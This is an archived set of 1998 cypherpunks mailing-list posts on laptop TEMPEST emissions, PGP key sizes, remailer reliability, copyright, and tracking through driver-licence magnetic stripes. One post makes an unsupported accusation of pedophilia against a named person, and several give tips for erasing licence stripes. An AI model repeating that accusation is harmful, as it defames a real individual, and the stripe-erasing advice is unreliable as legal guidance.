From: Jim Choate <ravage@ssz.com>
Date: Mon, 9 Feb 1998 14:55:54 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Laptop TEMPEST
Message-ID: <199802090657.AAA19180@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Doesn't the FCC have to test the RF emissions of all laptops as well as
monitors for sale as Class A and Class B in the US? Shouldn't that material
be available? I searched the main site, www.fcc.gov, but didn't find
anything regarding this. I sent a request for instructions on how to obtain
the emissions test results on computer monitors and laptops for commercial
and non-commercial use, foia@fcc.gov.

If anyone actualy knows of the location I would be much obliged if you would
pass it along.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Mon, 9 Feb 1998 15:22:52 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Soft Tempest
In-Reply-To: <v03102800b1044ad31629@[207.167.93.63]>
Message-ID: <199802090715.CAA24788@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:
> At 9:19 PM -0800 2/8/98, Ryan Lackey wrote:
> 
> >I'm a bit busy until at least after FC '98, or I'd do it myself.  One
> >of my goals is to keep my laptop as secure as possible, and that's
> >an application where TEMPEST shielding is rather prohibitive.
> 
> Really? You think so? You think TEMPEST treatment of laptops is more
> expensive than of normal machines?

I think it is more difficult to have a lightweight, portable, non-maintenance
intensive solution for tempest protecting a portable than for a big
desktop box.

A desktop box doesn't care how much it weighs.  It can even be put inside
a TEMPEST rack (I saw someone selling these at a convention once; I wanted
one, but didn't have any way to to ship it back to Boston.  Sigh), or just
TEMPEST protect the entire room.

One of the problems with TEMPEST protection is that the gaskets/etc. get
worn.  Or some stupid fsck paints the exposed copper in the doorway.  Or
whatever.  I don't think requiring that the thing be portable, lightweight,
etc. is going to make it any less likely to be damaged.  If the TEMPEST
protection is damaged, it's not as if a warning LED will come on -- TEMPEST
monitoring equipment is *way* too heavy to build into a laptop, so it will
fail silently.

> The physics suggests just the opposite: the RF emissions from laptops are
> expected to be lower from first principles, and, I have heard, are
> measurably much lower. (I say "have heard" because I don't have any access
> to RF measurement equipment...I once spent many hours a day working inside
> a Faraday cage, but that was many years ago.)

Certainly the traces are shorter, there are no big antennas (read: cables)
connecting parts, etc.  The power levels are power.  There aren't any
power cords if you're on battery.

However, a lot of them have plastic cases and generally piss-poor shielding
of any kind, too.
> 
> The first principles part is that the deflection yokes in a CRT are the
> largest radiated component of what got named "van Eck radiation." (I'd just
> call it RF, but whatever.)
> 
> Laptops are missing this component. (It might be interesting to see the
> radiated RF numbers for various kinds of flat panel displays.)

According to the Anderson paper, certain kinds of LCD-TFT have *easier to 
monitor* emissions than monitors.  I have no idea which is the case, but
I'm willing to err on the side of paranoia.  I should scrounge up some 
TEMPEST monitoring equipment around MIT somewhere and test it, though.
> 
> The emission from the keyboard would have to be looked at, of course.

It's an integrated component, no keyboard wire, so it's much less likely
to lose.
> 
> Also, laptops, being so small, are easy to shield with mesh bags. An
> inelegant approach would be to bend copper sheeting to form an enclosure. A
> more elegant approach might be to take one of the tight-fitting laptop
> cases (like the Silicon Sports "Wetsuit") and use it as a pattern for a
> case made of conductive mesh fabric...or even something like aluminum
> screen. Several layers would be even better.

You need to worry about the mesh bag corrding/breaking/etc.  But yeah, this
is a decent technique.  I wonder how small the mesh has to be to attenuate
30-40db of signal in the relevant frequencies, and if that makes it hard to
see/type through.  I should figure out what frequencies are involved.
> 
> But before going this route, I'd want to see some measurements. Laptops
> might already be "quiet enough." (Measurements are needed to determine the
> effectiveness of any proposed RF shielding anyway, so....)

The paper pretty clearly says laptop LCDs are not sufficiently quiet.  Until
I read this, I was under the impression they were; perhaps passive matrix
screens are and active are not. (actually, I can totally understand that
wrt the pulse modulation not present in modern crts)
> 
> Finally, for a number of years there have been proposals for viewing
> screens built into glasses or goggles. "Crystal Eyes" was one of them.
> Another was a replacement for standard EGA screens (this was 4-6 years
> ago). These were being announced during the period when virtual reality
> (VR) was expected to dominate...that hasn't happened, yet.
> 
> With some of these glasses, gargoyle-style, one could completely encase the
> laptop in a shielded case (like a Zero Haliburton) and then use a palm
> keypad...

I used to work in the MIT Media Lab's wearables project -- we used
this kind of approach.  Something called a "twiddler" chording keyboard 
(unshielded; my advisor fled the country before I could get a shielded one
set up), attached to a "private eye" monocular display; some odd resolution,
again unshielded.  Attached to a standard portable PC, a belt mounted
PC, or whatever.

I was going to put together a TEMPEST resistant wearable at some point.  In
addition, a mesh cloak; we'd been doing some privacy stuff, and discovered
that there were penetrating cameras in use by some surveilance companies/etc.
for anti-shoplifting/etc. -- it would be nice to shield against them.  It
never happened, oh well.

I had a real bitch of a time finding open source TEMPEST information, which
is part of why the idea was back-burnered.  I think there is a concerted
effort on the part of the government to prevent open source discussion of
the topic, through manipulation of research money, etc.  Most of my 
information was general purpose EE stuff and some EMP-shielding information,
so perhaps I'm inclined to overkill (when dealing with EMP, you have to worry
about 3 second duration *changes* in the field, so your faraday cage needs to
be of uniform materials, joints need to be the same as the material, etc.  
In the absence of material to suggest otherwise, I think the same criteria
apply to serious TEMPEST shielding, in the 85db+ range.  There is some 
speculation that the SECRET TEMPEST specs are not sufficient to resist
some modern SIGINT technology, and that there exist unknown standards for
real protection for some applications.  Perhaps this is unjustified paranoia).
> 
> Speaking of this sort of approach, a lower-tech version might be to use a
> palmtop, like the HP 95LX, as a remote terminal to a machine completely
> shielded. (The laptop could be in a shielded enclosure, or backpack, with
> the 95LX snaked to it with cables.) Given the battery operation, the long
> battery life (which says radiated RF is likely to be under control), the
> LCD display, etc., this should be pretty good against eavesdroppers.

Even a passive component has a resonant frequency; if you're attacking, you
may know it and can take advantage of this (hinted at in the paper).  I
don't think the palmtop being low power necessarily makes it immune, although
I'd bet it's a bit better off than a laptop.
> 
> I haven't yet looked at the Ross Anderson paper, but some things bother me
> about it. It seems unlikely that a "TEMPEST font" will affect keyboard and
> main CPU board noise. Also, in a multiple window environment, with several
> active windows, and with the target window being of varying sizes, I'm not
> quite sure I buy the idea that a remote sensing of the content of one
> window is very easy to pull off.
> 
> But I'll take a look at what Ross has to say.
> 
> --Tim May

I think the real solution is just what Ross said -- software + hardware.
With the right font and X server frobbery, you can get *better* net
image/text quality with TEMPEST protection and anti-aliasing than with neither.
And it's a great safety net in case your hardware protection is compromised.

Once the current project which by now is becoming rather tired of being
brought up in passing rather than in a real comprehensive form is on its
way, I'm going to look at the TEMPEST wearable, maybe with a verified
cryptographic hardware implementation for the important stuff.

An interim solution of a nice greyscale antialiased font in a java window
serving as a console, even if only for things like the pgp xterm, would
be a nice interim solution.  Especially since it should only take a few
hours to do, if someone has some font manipulation tools.

I was originally thinking of modifying the text mode console drivers, but
they use DOS text mode, which can't deal with greyscale.  The solution
is to use SVGAlib, GGI, or an X application.  A really cool solution
would be to make the X server itself do this to everything on the screen.
XFree86 is way too nasty a codebase for me to modify in my spare time, though.
I think Linux-GGI is the proper way to do it.
> 
> 
> 
> 
> 
> Just Say No to "Big Brother Inside"
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^3,021,377   | black markets, collapse of governments.
> 
> 
> 

-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Mon, 9 Feb 1998 15:44:54 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: Laptop TEMPEST
Message-ID: <tw7iuqput8o.fsf@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



FCC RF/EMC testing is well nigh useless for TEMPEST protection.

Compliance engineering firms have some equipment which might be useful
for TEMPEST experimentation, but the actual specs for Class B (Class A
is basically anything that won't kill you) are pretty worthless for
this application.

I imagine there may be some other "dual use" technologies through for
testing TEMPEST equipment.  Perhaps some medical equipment has stringent
stray emanation specs?

I believe the equipment you'd really want is the real "TS" (technical
surveillance) gear, which is 1) not available on the open market and 2)
expensive.  The paper seems to have involved an AM radio and an obsolete
piece of British TS kit; van Eck used a modified TV.  Any HAM could
probably build a suitable receiver, the real problem is knowing how much
attenuation is necessary to defeat the real TS gear.  This is why I am
fundamentally impressed by the obfuscation techniques from the paper, rather
than just straight shielding. 
-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Mon, 9 Feb 1998 16:31:07 +0800
To: Alan Tu <ATU5713@compuserve.com>
Subject: Re: What's the latest in factoring?
In-Reply-To: <199802072222_MC2-3262-79F5@compuserve.com>
Message-ID: <Pine.SOL.3.96.980209031217.29748A-100000@c00069-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 7 Feb 1998, Alan Tu wrote:

>anything more recent?  Also, whereas 1024 bits was the commonly accepted
>threshhold for key lengths more than two years ago, what's the threshhold
>now?  Because I have DOS (and like it) I use PGP 2.63ix, when should I
>retire my 1024-bit key?  I don't expect anybody to answer that I should
>do so immediately, but can someone give me an idea on what people are
>doing in regard to key length?
>
>Sincerely,
>
>Alan Tu

8192 bits is used now.  you can generate 8192 bit keys with PGP 2.6.3ui
(the unofficial international version).

check out "PGP Projects" at http://www.westfalen.de/hugo/pgp/
or "The Unofficial International PGP Home Page" at
http://members.tripod.com/~Crompton/pgp.htm
for info and download.

[note:  you can of course generate MUCH larger keys, but i'm attempting to
be practical for a change]

Regards,

TATTOOMAN 

/-=-=-=-=-=-=-=-=-=-=-=-[   TATTOOMAN   ]-=-=-=-=-=-=-=-=-=-=-=-\  
| NC State Computer Science Dept   VP of The  E. H. A. P. Corp. |
| jkwilli2@adm.csc.ncsu.edu        http://www.hackers.com/ehap/ |
| jkwilli2@unity.ncsu.edu          ehap@hackers.com             |
| WWW---[   http://152.7.11.38/~tattooman/                      |
| FTP---[   ftp://152.7.11.38/pub/personal/tattooman/           | 
| WW2---[   http://www4.ncsu.edu/~jkwilli2/                     |                           
| W3B---[   http://152.7.11.38/~tattooman/w3board/              |
| PGP---[   http://www4.ncsu.edu/~jkwilli2/pgp.asc              |
|       35 E1 32 C7 C9 EF A0 AB  9D FE 8E FC 2D 68 55 44        |
\-=-=-=-=-=-=-[   http://152.7.11.38/~tattooman/  ]-=-=-=-=-=-=-/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 9 Feb 1998 11:29:20 +0800
To: cypherpunks@cyberpass.net
Subject: Re: re: Driver Licenses (fwd)
In-Reply-To: <199802090012.SAA17348@einstein.ssz.com>
Message-ID: <199802090322.EAA09865@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> > >A few passes over a strong magnet sufficient or should a chemical
> > solvent
> > >be used?
> >
> > Either should work...I'll bet that scratching the shit off with his keys
> > worked too ;)
> > I'll have to remember that when it's time to get mine done.
> 
> My suggestion is not to alter the card such that a visual inspection would
> show. In most states it's a felony to modify or alter a drivers license,
> they are considered the property of the state and not yours personaly.
> 
> Next time a cop asks for ID and you hand him your d.l. you could be in for a
> lot more than  couple hundred dollars and a ticket.

"Yeah, officer, I dropped my ID in the street and it got run over.  Don't
give me such a hard time about it, I'm just glad I got it back..."
I really doubt you are going to get convicted for accidently dropping your
wallet because your ID got scraped up a little bit on the back side.

Seriously, the best way is a strong magnet.  You can also put it in your
shirt pocket and iron it, then apply a strong magnet.  The heat will make
it lose its magnetism more quickly; just make shure you don't melt it. :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 9 Feb 1998 18:12:13 +0800
To: anon@anon.efga.org
Subject: Re: Driver Licenses
In-Reply-To: <ac25297f5d97f55fb62fca290eeac01f@anon.efga.org>
Message-ID: <199802091006.FAA08443@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



I used to work in a lab with an MRI.  Erased my credit cards
regularly.  I visit from time to time. :)

Adam


Anonymous wrote:
| >Odd.  When I first got a card with the stripe, I was a little paranoid so
| >I took a bar magnet and erased it.  Actually, I don't know whether my
| >eraser worked because nobody has ever asked to swipe my card thru a
| >reader.  I got a wallet with a plastic fold-out so if someone asks to see
| >my id, I open my wallet and show it to them, then put it away.
| 
| How many of us have done this? I nuked mine in the parking lot of the DMV.
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 9 Feb 1998 23:00:38 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199802091450.GAA04639@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash middle latent cut ek";
$remailer{"winsock"} = "<winsock@rigel.cyberpass.net> cpunk pgp pgponly hash cut ksub reord ?";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp pgponly hash latent cut ek";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
$remailer{"reno"} = "<middleman@cyberpass.net> cpunk mix pgp hash middle latent cut ek reord ?";
$remailer{"cracker"} = "<remailer@anon.efga.org> cpunk mix remix pgp hash ksub esub latent cut ek reord post";
$remailer{'redneck'} = '<config@anon.efga.org> newnym pgp';
$remailer{"bureau42"} = "<remailer@bureau42.ml.org> cpunk mix pgp ksub hash latent cut ek";
$remailer{"neva"} = "<remailer@neva.org> cpunk pgp pgponly hash cut ksub ?";
$remailer{"lcs"} = "<mix@anon.lcs.mit.edu> mix";
$remailer{"medusa"} = "<medusa@weasel.owl.de> mix middle"
$remailer{"McCain"} = "<mccain@notatla.demon.co.uk> mix middle";
$remailer{"valdeez"} = "<valdeez@juno.com> cpunk pgp pgponly hash ek";
$remailer{"arrid"} = "<arrid@juno.com> cpunk pgp pgponly hash ek";
$remailer{"hera"} = "<goddesshera@juno.com> cpunk pgp pgponly hash ek";
$remailer{"htuttle"} = "<h_tuttle@rigel.cyberpass.net> cpunk pgp hash latent cut post ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.
remailer@crynwr.com is _not_ a remailer.

There is no remailer at relay.com.

Groups of remailers sharing a machine or operator:
(cyber mix reno winsock)
(weasel squirrel medusa)
(cracker redneck)
(nym lcs)
(valdeez arrid hera)

This remailer list is somewhat phooey. Go check out
http://www.publius.net/rlist.html for a good one.

Last update: Thu 23 Oct 97 15:48:06 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hera     goddesshera@juno.com             ------------  5:03:45  99.86%
nym      config@nym.alias.net             +*#**#**###       :34  95.82%
redneck  config@anon.efga.org             #*##*+#****      2:00  95.44%
mix      mixmaster@remail.obscura.com     +++ ++++++*     19:18  95.27%
squirrel mix@squirrel.owl.de              -- ---+---    2:34:19  95.16%
cyber    alias@alias.cyberpass.net        *++***+ ++      11:26  95.11%
replay   remailer@replay.com              ****   ***      10:06  94.93%
arrid    arrid@juno.com                   ----.------   8:50:34  94.41%
bureau42 remailer@bureau42.ml.org          ---------    3:38:29  93.53%
cracker  remailer@anon.efga.org           +  +*+*+*+      16:32  92.80%
jam      remailer@cypherpunks.ca          +  +*-++++      24:14  92.79%
winsock  winsock@rigel.cyberpass.net      -..-..----    9:59:18  92.22%
neva     remailer@neva.org                ------****+   1:03:02  90.39%
valdeez  valdeez@juno.com                               4:58:22 -36.97%
reno     middleman@cyberpass.net                        1:01:28  -2.65%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mark@unicorn.com
Date: Mon, 9 Feb 1998 23:16:21 +0800
To: cypherpunks@cyberpass.net
Subject: Re: the best justice money can buy --Lessig (fwd)
Message-ID: <887036600.23860.193.133.230.33@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate (ravage@ssz.com) wrote:
>So do I, and I bet both our incomes combined doesn't add up to 15 minutes of
>Bill G's and it won't. 

Of course not, because Bill has jackbooted copyright enforcers to subsidise
his corporation. Without them his income would be dramatically reduced.

>From a market perspective we're flies on the back of
>great elephant. Please be so kind as to describe how and why this marketing
>mechanism (copyleft) will succed? 

Uh, I said copyright should be abolished, you said noone would write
software, I said that Linux disproved that claim. How is this relevant
to that discussion? Of course it's not going to take over when companies
can get billions of dollars of subsidies in the form of copyright
enforcement, but it clearly shows that without copyright people will
produce better software than Microsfot has ever written.

>I've been using and supporting Linux since
>1993 (SSZ is listed as a source site in the back of 'Running Linux' since 
>day one) in this manner neither I or anyone else has gotten rich.

Exactly. So tell us how Bill would have become a billionaire without
copyright?

>It's copyrighted in the important sense in that it uses the copyright to
>enforce its conditions. That is just as important as the marketing decisions
>made by it.

All it enforces is source-code distribution (and I've yet to hear of a single
case where it's ever been used). That's important to the developers, but not 
to the average user. The situation would be little changed in a world with 
no copyright, because if anyone did try to keep their source secret anyone 
who got a copy could freely distribute it.

I'm truly amazed to find all these pro-copyright views on the list, when
cypherpunks have been at the forefront of creating technologies to make it
unenforceable and obsolete.

    Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Mon, 9 Feb 1998 21:13:34 +0800
To: cypherpunks@toad.com
Subject: Re: 145 Million
In-Reply-To: <199801260540.XAA10977@mail.t-1net.com>
Message-ID: <Pine.SOL.3.96.980209072203.14738B-100000@c00953-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 25 Jan 1998 MAILER-DAEMON@toad.com wrote:

>Removal instructions below.
>
>If someone with an 8th grade education can make a personal 
>fortune of $145 million in network marketing with herbs, 

that's a shitload of weed!  it would be quite risky too trying to move
over 45,000 lbs of quality weed.  you are right though that anyone
with an 8th grade education can do it....in fact, i would say most of the
ppl trying to achieve this probably have an 8th grade education or less.

>why can't you?  Especially when this person has just decided 

um....because i didn't enjoy prison the first time?

>to come out of retirement to launch an upstart company, 
>marketing products that were used by the Russians to win all 
>those gold medals at the Olympic Games.  With more scientific 

Russians winning gold medals?  you want me to push steroids too?

>research than anything else on the market, it's no wonder why 
>so many doctors are joining our company and offering these 
>products to their patients.

dope dealers = doctors?  crackheads = patients?

>Why not do something different to change your life?  Join in 

ok, pass me that crack pipe you're tokin on then.

>with the person who knows how to make things happen big and 
>fast.  He has just joined our company and is willing to help 
>you learn how to 'set yourself free'.

uhh....Scarface died trying to do this, didn't he?

>Someday maybe you can throw the alarm clock out the window.  
>For good.

but my pager and cellfone will be going off constantly.  since i'll
probably be jacked on crystal meth all the time, i guess i won't mind
though....

>For additional information, please check out the following:
>http://www.prime-1.com
>
>Thanks
>
>
>For guaranteed removal call 1-800-555-9205, ext. 3256,
>24 hours a day. 
>

yeah, right.

TATTOOMAN 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 9 Feb 1998 22:06:14 +0800
To: cypherpunks@toad.com
Subject: Re: 145 Million
In-Reply-To: <Pine.SOL.3.96.980209072203.14738B-100000@c00953-100lez.eos.ncsu.edu>
Message-ID: <2uymke8w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Ken Williams <jkwilli2@unity.ncsu.edu> writes:

> >to come out of retirement to launch an upstart company,
                  ^^^^^^^^^^ jail :-)
> >marketing products that were used by the Russians to win all
> >those gold medals at the Olympic Games.  With more scientific
>
> Russians winning gold medals?  you want me to push steroids too?

I suspect they used much more than steroids and that half the chemicals
are so secret they're not illegal yet.  You don't think Russian gymnast
girls were on steroids, do you? ;-) (They do have to take the Pill, so
they don't get their period in the middle of a performance.)

Guy Polis is a pedophile who became interested in cryptography because
he didn't want to the cops to read the child pornography pictures on his
hard disk.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 9 Feb 1998 22:17:25 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: re: Drivers Licenses (fwd)
Message-ID: <199802091420.IAA20507@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 9 Feb 1998 09:25:55 +0100 (CET)
> From: Lucky Green <shamrock@cypherpunks.to>
> Subject: re: Drivers Licenses (fwd)

> On Sun, 8 Feb 1998, Jim Choate wrote:
> > I have a proposal. Lucky is supposed to be in Austin for the CFP conference.
> > If he is agreeable, he could ask to examine a Tx. d.l. We could leave it up
> > to his opinion as to whether these would be easy to alter.
> 
> Why me?

Convenience. You seemed like the right person who would be in the right
place with the right technical skills to ask for indipendent opinion.

You obviously don't feel comfortable with it. I apologize for the intrusion.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 9 Feb 1998 22:21:43 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Driver Licenses (fwd)
Message-ID: <199802091425.IAA20569@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 9 Feb 1998 09:00:12 +0100 (CET)
> From: Lucky Green <shamrock@cypherpunks.to>
> Subject: Re: Driver Licenses

> The clerk at my local 7/11 assured me the information captured would not
> be forwarded to a central site. Yet. It appears the stores are installing
> these systems to protect themselves against police sting "test buys", in
> which the authorities take persons just days shy of their 21st birthday,
> put theater makeup and/or a gray beard and wig on them and thus entrap
> store clerks into selling controlled substances to minors.
> 
> As any fool can predict, the information captured will not remain local
> for long. After all, the system is ideal for monitoring gun^H^H^H alcohol
> purchases of parolees, tracking down deadbeat dads, etc.

I have worked doing technical support for McDonalds in two of my past jobs.
I assure you that when they dump the stores records each night they are
dumping this as well. They dump gas sales from the automated machines as a
matter of course. The real question is who besides Southland Corp.
subsidies are they selling this info to?


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Tue, 10 Feb 1998 00:42:33 +0800
To: shamrock@cypherpunks.to
Subject: Re: Driver Licenses
In-Reply-To: <Pine.BSF.3.96.980209084404.15559A-100000@pakastelohi.cypherpunks.to>
Message-ID: <199802091627.IAA15679@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:
> 
> On Sun, 8 Feb 1998, William H. Geiger III wrote:
> > My question is what is the best way to remove this information from the
> > cards?
> 
> Making the mag stripe on a driver license unreadable by a POS terminal is
> easy. A refrigerator magnet will suffice. There is only one problem:
> chances are you then won't be sold any alcohol.
> 
> See, major chains, such as the Southland corporation [7/11], recently
> installed POS terminals that are linked to the cash register. [This may
> not have reached a particular reader's area yet, please don't reply with
> "but my 7/11 down the corner does not do this"].

I have no idea if my local 7/11 does this.  I don't even know
where my local 7/11 is.  I do however find it interesting that they're
implementing this policy when there are still legally-issued non-mag-stripe
driver's licenses in circulation... like mine, issued in 1980
(extended many times) and valid til the end of this year.


> Unless a driver license has been swiped, the cash register will not permit
> the clerk to ring up the sale. It doesn't matter how old you are, you can
> be 80 years old and in a wheelchair, no government issued ID with working
> mag stripe, no alcohol or tobacco products for you.

Never mind that the CDL isn't supposed to be a citizen's ID badge.
 
> The clerk at my local 7/11 assured me the information captured would not
> be forwarded to a central site. Yet. It appears the stores are installing
> these systems to protect themselves against police sting "test buys", in
> which the authorities take persons just days shy of their 21st birthday,
> put theater makeup and/or a gray beard and wig on them and thus entrap
> store clerks into selling controlled substances to minors.
> 
> As any fool can predict, the information captured will not remain local
> for long. After all, the system is ideal for monitoring gun^H^H^H alcohol
> purchases of parolees, tracking down deadbeat dads, etc.

We're building Big Brother, one tiny step at a time.
I hear we're going to war against Oceania again next month.

-- 
Eric Murray  Chief Security Scientist  N*Able Technologies  www.nabletech.com
(email:  ericm  at  lne.com   or   nabletech.com)          PGP keyid:E03F65E5





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 9 Feb 1998 22:28:24 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Laptop TEMPEST (fwd)
Message-ID: <199802091430.IAA20623@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: Laptop TEMPEST
> From: Ryan Lackey <rdl@mit.edu>
> Date: 09 Feb 1998 02:34:15 -0500

> FCC RF/EMC testing is well nigh useless for TEMPEST protection.

I disagree, it would give you a gross baseline on the total emissions
between monitors and laptops. That field strenght measurement would at least
allow you to calculate radiuses of equal strength to calculate approximately
how far the emissions are from each class of device for equal probabilities
of detection. One of the specific goals is to measure how effective the
device is at effecting other co-located devices (such as seeing ghost images
on other monitors or causing static in paging equipment).

I suspect one could do it with a spectrum analyzer or a grid dip meter.

> I imagine there may be some other "dual use" technologies through for
> testing TEMPEST equipment.  Perhaps some medical equipment has stringent
> stray emanation specs?

We're not trying to bring the individual vertical retraces out of the
chaff...we're trying to calculate the total comparitive emission strengths.
If that isn't high enough then trying to get individual componants of that
field will be useless.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
